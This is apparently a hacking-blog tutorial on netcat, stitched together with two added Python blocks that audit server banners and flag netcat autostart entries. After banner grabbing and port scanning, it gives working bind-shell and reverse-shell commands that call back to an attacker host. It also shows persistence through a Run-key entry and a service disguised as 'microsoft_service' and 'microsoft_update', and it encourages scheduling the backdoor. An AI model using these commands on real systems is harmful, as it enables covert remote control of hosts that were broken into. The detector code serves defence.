Netcat is actually not a hacking tool. It is a networking tool. We can use
it to communicate with other computers remotely, to transfer data, etc. But
we can also use it as a backdoor or hacking tool. "ping" is not a hacking
or DoS tool, but we can DoS using "ping" ... no? That is why we can't call
it a DDoS tool either.
Anyway, netcat is often called the "Swiss Army Knife".
I will explain its basic usage now.
All options in netcat:
nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
We can use netcat as a backdoor, and for banner grabbing, port scanning, chatting, file transfer, traffic redirection, etc.
Banner Grabbing:
root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
sent 16, rcvd 617
How: run nc -vvv ip port, type GET / HTTP/1.1 and hit Enter twice.
Simply put, we see that the version of the web server is Apache 2.2.21 (Win32). Not only that, we can see the OpenSSL version, PHP version, etc. Do you know how a scanner scans for vulnerabilities against a target? The scanner first finds the version of the server/application, then checks it against its local database (for example Nessus, Acunetix, etc.). We can also Google for vulnerabilities in that specific version ... no?
The same way we can find other applications' versions and information:
root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.
You can try to connect to any port except 443, since netcat can't speak SSL. Or do the tunneling through something that does.
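The version-to-database step described above, written out as an added example (not code from the original post): it parses the Server header and the FTP 220 greeting from the two captures above and compares each component against a minimum-version policy, which is the same check a defender's own inventory audit would run on these banners. The banners are constructed inline and the policy minimums are made-up values for the example.

```python
import re

# Constructed sample banners, modelled on the two netcat captures above
# (HTTP 400 response on port 80, FTP greeting on port 21).
HTTP_BANNER = (
    "HTTP/1.1 400 Bad Request\r\n"
    "Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1\r\n"
    "Connection: close\r\n\r\n"
)
FTP_BANNER = "220 FileZilla Server version 0.9.39 beta written by Tim Kosse\r\n"

# Hypothetical minimum versions a site policy might require (constructed for this example).
POLICY_MIN = {"Apache": "2.2.22", "OpenSSL": "1.0.1", "PHP": "5.3.10", "FileZilla Server": "0.9.40"}

PRODUCT_RE = re.compile(r"([A-Za-z_][\w-]*)/v?(\d+(?:\.\d+)*[a-z]?)")   # product/version tokens
FTP_RE = re.compile(r"^220[ -](.+?) version (\d+(?:\.\d+)*)", re.I)     # "220 <product> version <ver>"

def version_key(v):
    """Turn '1.0.0e' into ((1, 0, 0), 'e') so numeric parts compare first, letter suffix last."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", v)
    if not m:
        return ((), v)
    return (tuple(int(x) for x in m.group(1).split(".")), m.group(2))

def parse_banner(banner):
    """Return {product: version} from an HTTP Server header or an FTP 220 greeting."""
    found = {}
    for line in banner.splitlines():
        if line.lower().startswith("server:"):
            for prod, ver in PRODUCT_RE.findall(line.split(":", 1)[1]):
                found[prod] = ver
        else:
            m = FTP_RE.match(line)
            if m:
                found[m.group(1).strip()] = m.group(2)
    return found

def outdated(found, policy=POLICY_MIN):
    """List (product, seen, required) for every component below the policy minimum."""
    hits = []
    for prod, ver in found.items():
        if prod in policy and version_key(ver) < version_key(policy[prod]):
            hits.append((prod, ver, policy[prod]))
    return sorted(hits)
```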
Chat with your hacker friend:
Suppose there are two hackers called hacker1 and hacker2. They don't want to get caught using another messenger, or they just want private communication.
How do they do this? Simple command:
hacker1 (netcat listening):
nc -vvv -l -p 4444
-vvv stands for verbose (as much as possible)
-l for listening (opening the port to connect to)
-p for port (the specific port to listen on)
hacker2 (connecting to hacker1):
nc -vvv 192.168.96.129 4444 (4444 is the port)
Transfer the File:
Hackers do not want to transfer files via a public file-sharing server because of the risk. But they can use netcat to transfer the file.
Suppose hacker1 (blackhat) has a passwords file on his computer (192.168.96.129) and wants to transfer it to hacker2 (192.168.1.213).
Hacker1's netcat command:
nc -vvv -l -p 4444 <passwords.txt
hacker2's netcat command:
nc -vvv 192.168.96.129 4444 >passwords.txt
Let's do a port scan using netcat:
We can scan ports with the simple command nc -vvv targetip 1-65535
or
nc -vvv -z targetip 1-65535
Here the extra "-z" option selects zero-I/O mode: no data is sent, only the connection attempt is made, which is what scanning needs.
Simple way to create a backdoor using netcat:
Windows server mode:
nc -L -p 1337 -e cmd.exe
-L don't die (keep listening after the client disconnects).
-e start the command line (cmd.exe) on connect.
Linux/Unix server mode:
nc -l -p 1337 -k -e /bin/bash
-k don't die (note: in the v1.10 build whose -h output is shown above, -k sets the socket keepalive option; the keep-listening meaning belongs to other netcat variants).
-e program to exec on connect (here /bin/bash).
Connect to the server:
nc -vv targetip 1337
How about a reverse connection? Try the following on the victim machine:
nc -e cmd -d attackerip 1337
On your own computer (attacker):
nc -vv -l -k -p 1337
Now you are thinking: how can a hacker install netcat on the victim's computer... right?
1. They first compromise the system/server. Now they want permanent access, so the only way is uploading a backdoor and setting it as a startup application.
2. They create a batch file, shell script or downloader, then send it to the victim (undetected by AV). Whenever the victim clicks the script, it starts downloading, installing, etc. automatically.
So how do you make netcat a stealth backdoor? The answer is registry editing. Suppose you compromised an IIS web server and uploaded the cmdasp.asp backdoor. Now you want to install netcat as a stealth backdoor for some reason.
Netcat as a startup backdoor:
Run this command:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d "c:\nc.exe -d targetip 1337 -e cmd.exe"
Create a netcat listener on your local computer. Whenever the victim reboots his computer, it will connect back to you.
Hackers can also simply create a batch script and move it to the startup folder, but it is a bad idea.
What about netcat as a service? Try:
sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
Now try to make the backdoor connect to you at a specific time (hint: at).
By the way, you can do many more things with netcat. Netcat is not so bad as a backdoor. You now know how netcat can be used for hacking purposes, so be aware and protect yourself.
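On the protection side, here is an added defensive example (not code from the original post): a small audit that walks autostart and service records shaped like the Run-key and sc create commands above and flags any entry that launches netcat with a program attached to the socket via -e or -c. The record format, the inventory source names and the benign sample entries are assumptions constructed for the example.

```python
import re
import shlex

# Constructed sample records, as a host inventory export might list them:
# (source, name, command). The first two mirror the Run-key and service commands
# shown above; the others are benign entries that must not fire.
SAMPLE_RECORDS = [
    ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "microsoft_service",
     "c:\\nc.exe -d targetip 1337 -e cmd.exe"),
    ("service", "microsoft_update", "cmd /K start c:\\nc.exe -d ip-of-hacker port -e cmd.exe"),
    ("service", "Spooler", "C:\\Windows\\System32\\spoolsv.exe"),
    ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SecurityHealth",
     "C:\\Windows\\system32\\SecurityHealthSystray.exe"),
    ("crontab", "root", "/usr/bin/nc -l -p 1337 -k -e /bin/bash"),
    ("crontab", "backup", "/usr/bin/nc -z backuphost 22"),   # connectivity probe, no -e
]

# Last path component is a netcat binary name (nc, ncat, netcat, with or without .exe).
NETCAT_BIN = re.compile(r"(?:^|[\\/])(?:nc|ncat|netcat)(?:\.exe)?$", re.I)
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}

def find_netcat_exec(command):
    """Return the program bound to the socket if netcat is run with an exec flag, else None."""
    try:
        tokens = shlex.split(command, posix=False)   # keep Windows backslashes literal
    except ValueError:
        tokens = command.split()
    for i, tok in enumerate(tokens):
        if NETCAT_BIN.search(tok.strip('"')):
            rest = tokens[i + 1:]
            for j, flag in enumerate(rest):
                if flag in EXEC_FLAGS and j + 1 < len(rest):
                    return rest[j + 1]
    return None

def audit(records):
    """Flag autostart/service entries that start netcat with -e/-c; note listen vs connect-back."""
    findings = []
    for source, name, command in records:
        prog = find_netcat_exec(command)
        if prog is None:
            continue
        mode = "listener" if re.search(r"(?:^|\s)-[lL](?:\s|$)", command) else "connect-back"
        findings.append({"source": source, "name": name, "exec": prog, "mode": mode})
    return findings
```

The token matching is deliberately plain: a renamed binary or combined flags such as -lp will slip past it, so this check complements, rather than replaces, monitoring of which processes open network sockets at boot.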
Try more....
More about it:
www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139 (Download for windows)